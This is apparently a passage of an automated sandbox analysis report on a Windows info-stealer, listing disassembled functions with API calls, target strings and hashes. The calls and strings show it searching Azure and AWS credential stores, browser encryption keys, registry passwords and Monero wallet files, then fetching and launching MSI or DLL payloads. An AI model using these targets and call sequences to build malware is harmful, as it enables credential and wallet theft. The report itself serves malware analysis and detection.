                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 110194572d335d5e2c2bec7378f4421b56730070b27e5f2468e804525c7638fe
                                • Instruction ID: 989e47edabc6193aaaba996472d071f345b66da5c6c4ba04ced7affed4a467a0
                                • Opcode Fuzzy Hash: 110194572d335d5e2c2bec7378f4421b56730070b27e5f2468e804525c7638fe
                                • Instruction Fuzzy Hash: C441A3B9A503186BDB60F760EC47FED3338AB24700F404454B585661C2EEB59BCD8BB2
                                Function 00DD9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DD906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 65ffd1319605bf6dd9b50b356ec403b47b9072fe305fa86d29f0a0cb7ab66492
                                • Instruction ID: c35ec97e1e5ab29d648389d40acf7fab5466aa5fc612d084f7d1bccda2df4223
                                • Opcode Fuzzy Hash: 65ffd1319605bf6dd9b50b356ec403b47b9072fe305fa86d29f0a0cb7ab66492
                                • Instruction Fuzzy Hash: C471DC75A10208EBDB14EBE4D899FEEB7B8FB48700F108518F556A7284DB79E905CB70
                                Function 00DD2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD34EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 462853a28e1fc02675dd01236d7ba6c684c79e71b4ff0f79c8a768291a0b880f
                                • Instruction ID: 71f57b9d42355c32aa3f4bcedf2e1da6f609e0f7190ce703a556e3dc1c1daa69
                                • Opcode Fuzzy Hash: 462853a28e1fc02675dd01236d7ba6c684c79e71b4ff0f79c8a768291a0b880f
                                • Instruction Fuzzy Hash: 21122F718001189ADB15FBA4DC92FEEB738EF14300F50816AF50666291EF746B4ADFB6
                                Function 00DD52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC6280: InternetOpenA.WININET(00DE0DFE,00000001,00000000,00000000,00000000), ref: 00DC62E1
                                  • Part of subcall function 00DC6280: StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6303
                                  • Part of subcall function 00DC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DC6335
                                  • Part of subcall function 00DC6280: HttpOpenRequestA.WININET(00000000,GET,?,0162E278,00000000,00000000,00400100,00000000), ref: 00DC6385
                                  • Part of subcall function 00DC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00DC63BF
                                  • Part of subcall function 00DC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC63D1
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00DD5318
                                • lstrlen.KERNEL32(00000000), ref: 00DD532F
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00DD5364
                                • lstrlen.KERNEL32(00000000), ref: 00DD5383
                                • lstrlen.KERNEL32(00000000), ref: 00DD53AE
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 576b7ea911509eefc1d38380079e15f4217d5dbd6ed4b6bb433e2e47ed8ab86b
                                • Instruction ID: 12623b8ac53e3fdbb64c2ca48ba32995991021728e2a3b390e964578ba3a5365
                                • Opcode Fuzzy Hash: 576b7ea911509eefc1d38380079e15f4217d5dbd6ed4b6bb433e2e47ed8ab86b
                                • Instruction Fuzzy Hash: 0B510D30950149ABCB14FF68D996EED7779EF10300F508119F80A5B292EF34AB46DB72
                                Function 00DD12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 56818c83e133ee8e9d143cf32ece2b47e63db6ac80d0ab48580d58eb35d40c0d
                                • Instruction ID: b8ea091eab2000ae4300d8102ae6ad97dfead833515e45f7c6ed75329f70851d
                                • Opcode Fuzzy Hash: 56818c83e133ee8e9d143cf32ece2b47e63db6ac80d0ab48580d58eb35d40c0d
                                • Instruction Fuzzy Hash: 95C1C5B5A00218ABCB14EF60DC89FEA7778FF54304F004599F50AA7241EB75AA85DFB1
                                Function 00DD4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DD8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD42EC
                                • lstrcat.KERNEL32(?,0162E338), ref: 00DD430B
                                • lstrcat.KERNEL32(?,?), ref: 00DD431F
                                • lstrcat.KERNEL32(?,0162D530), ref: 00DD4333
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DD8D90: GetFileAttributesA.KERNEL32(00000000,?,00DC1B54,?,?,00DE564C,?,?,00DE0E1F), ref: 00DD8D9F
                                  • Part of subcall function 00DC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DC9D39
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD93C0: GlobalAlloc.KERNEL32(00000000,00DD43DD,00DD43DD), ref: 00DD93D3
                                • StrStrA.SHLWAPI(?,0162E2F0), ref: 00DD43F3
                                • GlobalFree.KERNEL32(?), ref: 00DD4512
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9AEF
                                  • Part of subcall function 00DC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B01
                                  • Part of subcall function 00DC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9B2A
                                  • Part of subcall function 00DC9AC0: LocalFree.KERNEL32(?,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00DD44A3
                                • StrCmpCA.SHLWAPI(?,00DE08D1), ref: 00DD44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DD44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00DD44E5
                                • lstrcat.KERNEL32(00000000,00DE0FB8), ref: 00DD44F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: dad2f3143a395b35a54e81caaaf641f0abfa27f446163a2a7f4993c75eb9fedb
                                • Instruction ID: f6e3b7bebe48af28e4ac526fcd0222a04326c7c9d7d46e7a880994b11c6cc7aa
                                • Opcode Fuzzy Hash: dad2f3143a395b35a54e81caaaf641f0abfa27f446163a2a7f4993c75eb9fedb
                                • Instruction Fuzzy Hash: 767174B6A00208ABCB15FBA0DC95FEE7379EB48300F048599F60597181EA75DB49CFB1
                                Function 00DC1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DC12B4
                                  • Part of subcall function 00DC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00DC12BB
                                  • Part of subcall function 00DC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DC12D7
                                  • Part of subcall function 00DC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DC12F5
                                  • Part of subcall function 00DC12A0: RegCloseKey.ADVAPI32(?), ref: 00DC12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00DC134F
                                • lstrlen.KERNEL32(?), ref: 00DC135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00DC1377
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00DC1465
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00DC14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: b06c959672b53c7289d68fb46a0922e36dff31b4a495e4e0a7275ca83f15caf5
                                • Instruction ID: 361322f4c85e54122690198fd09572f9c29a16a3ffa98eeaadd72b2f4fd989b6
                                • Opcode Fuzzy Hash: b06c959672b53c7289d68fb46a0922e36dff31b4a495e4e0a7275ca83f15caf5
                                • Instruction Fuzzy Hash: CB5132B19502199BCB25FB64DC92FED733CEF54700F408199B60A62182EE746B89CFB5
                                Function 00DC75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DC733A
                                  • Part of subcall function 00DC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DC73B1
                                  • Part of subcall function 00DC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DC740D
                                  • Part of subcall function 00DC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00DC7452
                                  • Part of subcall function 00DC72D0: HeapFree.KERNEL32(00000000), ref: 00DC7459
                                • lstrcat.KERNEL32(00000000,00DE17FC), ref: 00DC7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DC7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00DC765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DC768F
                                • lstrcat.KERNEL32(00000000,00DE1804), ref: 00DC76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00DC76D3
                                • lstrcat.KERNEL32(00000000,00DE1808), ref: 00DC76ED
                                • task.LIBCPMTD ref: 00DC76FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: fa7d201298e426259f568843d05602aa8b6821267650b5c217f686b04cc381c6
                                • Instruction ID: 0ea7abba31dfbfdd4e1da13b35fcfb742ab40356e90f9c93914073fa851c9020
                                • Opcode Fuzzy Hash: fa7d201298e426259f568843d05602aa8b6821267650b5c217f686b04cc381c6
                                • Instruction Fuzzy Hash: 5F312D75A0420ADFCB55EBA4DC95EEE7779EB88301F204118F142A7284DA39E946DB70
                                Function 00DC60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DC4839
                                  • Part of subcall function 00DC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DC4849
                                • InternetOpenA.WININET(00DE0DF7,00000001,00000000,00000000,00000000), ref: 00DC610F
                                • StrCmpCA.SHLWAPI(?,0162EA98), ref: 00DC6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00DC618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00DC61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00DC61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DC620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00DC6249
                                • InternetCloseHandle.WININET(?), ref: 00DC6253
                                • InternetCloseHandle.WININET(00000000), ref: 00DC6260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
